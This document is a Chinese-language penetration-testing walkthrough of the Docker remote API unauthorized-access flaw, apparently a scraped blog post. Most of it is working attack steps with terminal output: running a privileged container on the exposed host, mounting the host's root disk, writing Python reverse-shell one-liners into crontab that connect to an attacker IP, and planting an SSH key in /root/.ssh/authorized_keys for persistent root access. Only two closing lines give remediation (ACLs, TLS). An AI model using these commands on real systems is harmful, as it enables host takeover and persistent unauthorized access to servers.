添加链接
link管理
链接快照平台
  • 输入网页链接,自动生成快照
  • 标签化管理网页链接

0x00 漏洞简介

docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API,方便docker集群管理和扩展。

0x01 正文

验证漏洞存在

直接输入地址 http://your-ip:2375/version(端口会因为配置问题稍有出入) 若能访问,证明存在未授权访问漏洞。

测试可达性

┌──(kali㉿kali)-[~/Desktop]└─$ ping 192.168.249.202 PING 192.168.249.202 (192.168.249.202) 56(84) bytes of data.64 bytes from 192.168.249.202: icmp_seq=1 ttl=128 time=1.97 ms64 bytes from 192.168.249.202: icmp_seq=2 ttl=128 time=2.26 ms^C--- 192.168.249.202 ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1002msrtt min/avg/max/mdev = 1.971/2.116/2.261/0.145 ms                                                                                                       ┌──(kali㉿kali)-[~/Desktop]└─$ docker -H tcp://192.168.249.202:5555 psCONTAINER ID   IMAGE   COMMAND   CREATED   STATUS   PORTS   NAME
常见dockers管理命令docker -H tcp://192.168.249.202:5555 ps  #查看远程机器上docker运行情况docker -H tcp://192.168.249.202:5555 images  #查看远程机器上的正在运行的docker镜像
┌──(root㉿kali)-[/home/kali/Desktop]└─# docker -H tcp://192.168.249.202:5555 pull alpine                       Using default tag: latestlatest: Pulling from library/alpineDigest: sha256:bc41182d7ef5ffc53a40b044e725193bc10142a1243f395ee852a8d9730fc2adStatus: Image is up to date for alpine:latestdocker.io/library/alpine:latest                                                                                                       ┌──(root㉿kali)-[/home/kali/Desktop]└─# docker -H tcp://192.168.249.202:5555 run -it --privileged alpine bin/sh    / # lsbin    etc    lib    mnt    proc   run    srv    tmp    vardev    home   media  opt    root   sbin   sys    usr/ # ifconfigeth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02            inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:8 errors:0 dropped:0 overruns:0 frame:0          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0           RX bytes:656 (656.0 B)  TX bytes:0 (0.0 B)
lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

挂载硬盘sda2

/ # fdisk -lDisk /dev/sda: 894 GB, 960197124096 bytes, 1875385008 sectors116737 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Device Boot StartCHS EndCHS StartLBA EndLBA Sectors Size Id Type/dev/sda1 0,32,33 522,75,1 2048 8390655 8388608 4096M 82 Linux swap/dev/sda2 * 522,75,2 1023,254,63 8390656 1875378175 1866987520 890G 83 LinuxDisk /dev/sdb: 894 GB, 960197124096 bytes, 1875385008 sectors116737 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/sdb doesn't contain a valid partition tableDisk /dev/sdf: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/sdf doesn't contain a valid partition tableDisk /dev/sdd: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/sdd doesn't contain a valid partition tableDisk /dev/sdc: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/sdc doesn't contain a valid partition tableDisk /dev/sde: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/sde doesn't contain a valid partition tableDisk /dev/dm-0: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-0 doesn't contain a valid partition tableDisk /dev/dm-1: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-1 doesn't contain a valid partition tableDisk /dev/dm-2: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-2 doesn't contain a valid partition tableDisk /dev/dm-3: 894 GB, 960181043200 bytes, 1875353600 sectors116735 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-3 doesn't contain a valid partition tableDisk /dev/dm-4: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-4 doesn't contain a valid partition table/ # mkdir test/ # lsbin etc lib mnt proc run srv test usrdev home media opt root sbin sys tmp var/ # mount /dev/sda2 test/ # cd test/test # whoamiroot/test # touch just.txt/test # lsbin home lib64 log-2022-04 log-2022-08 proc srv varboot iDiscovery log-2021-09 log-2022-05 media root sysdev just.txt log-2021-11 log-2022-06 mnt run tmpetc lib log-2021-12 log-2022-07 opt sbin usr//至此sda2挂载到test下

尝试反弹shell

(crontab -l;printf " * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'n")|crontab -
echo "*/1 * * * * root python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'" >> /test/etc/crontab

经过以上尝试发现均反弹不会来,冥思苦想最后发现是被攻击机不出内网。。。。

更换vps进行尝试

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsYNh4bLNmhQ7Cu64zYsIrxYWyEGz2dbd2B4s+SeX0h7c2p1UboZ1IUB60D3R05pExRcIxbX+P7k3PSeCnHHJG6JSqiahPxR7+J+sCvVr4Ki6inP87P8kpIRmXR2iTnIm5+Q/1cuxGgdF9ut6mBfUA4G8HV0AGhdsyaO6HdeS5iVYyc3tNfKDaZPqXi0UA6RPXDfhO9AfxUYn+sbHkJqTP9sI/4yRr+lN9UquyCGc03my16wThgSUp5aXxJqkpOuzSjHxBcsHWKFB/FfQVIGqDJuqU01V13NuL23ag8aDL root@" > /root/.ssh/authorized_keysssh root@IP -i id_rsa

0x02 修复建议

设置ACL,只允许信任的IP端口连接对应端口

开启TLS,使用生成的证书进行认证